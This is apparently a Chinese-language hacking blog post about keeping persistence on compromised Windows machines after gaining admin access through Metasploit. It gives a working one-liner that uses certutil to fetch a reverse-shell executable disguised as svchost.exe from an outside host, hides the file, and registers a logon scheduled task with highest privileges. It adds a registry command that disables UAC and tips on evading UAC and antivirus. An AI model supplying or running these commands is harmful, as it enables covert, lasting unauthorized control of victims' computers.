0x00 前言
很早之前就想写这玩意儿了,只不过一直因为时间问题一直拖到了现在,经过2天的各种查资料终于写出了一个最简单的
这里必须要吐槽一下360,流氓软件出身的果然不一样,修改注册表拦截,移动文件到启动目录拦截,system32文件夹下载文件拦截,你就说你有什么不拦截吧!!!
0x01 思路
先获取肉鸡的管理员权限,然后通过一系列手段达到肉鸡重启后能再次反弹一个管理员权限shell的目的(如果肉鸡装了360。。。直接跳过吧,不知道怎么绕过拦截添加计划任务)
思路:
- msf 上线
- 添加计划任务
细分一下:
- msf上线
- 进入
c:/windows
文件夹 - 自动下载可执行文件(就是你的反弹shell)
- 添加计划任务
0x02 具体操作
拿到管理员权限过后也就执行一句话
cd C:/Windows&&certutil -urlcache -split -f https://xxx/svchost.exe&&attrib +s +h svchost.exe&&schtasks.exe /Create /TN update /TR C:\Windows\svchost.vbs /SC ONLOGON /F /RL HIGHEST
每个命令大概解释
- 进入
C:/Windnws
文件夹 - 下载我的反弹shell(这个是弹到msf上的)
- 隐藏我的shell文件
- 新建一个计划任务,在用户登陆后开始执行
0x03 解决问题
你的reverse_shell
需要解决的问题
- 免杀 (自己想办法解决吧)
- 能自行判断肉鸡是否联网(因为开机直接运行,没联网的话也就凉凉了)
演示视频:https://youtu.be/IYKFERG_53Y
0x04 也有简单粗暴的办法
- 关闭UAC
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
-
将自己的shell可执行文件名字修改为
setup
或者install
或者uninstall
等本来会触发UAC的关键字 -
加入开机项
- 修改注册表
- 直接加入开机目录
原文链接
欢迎互换友链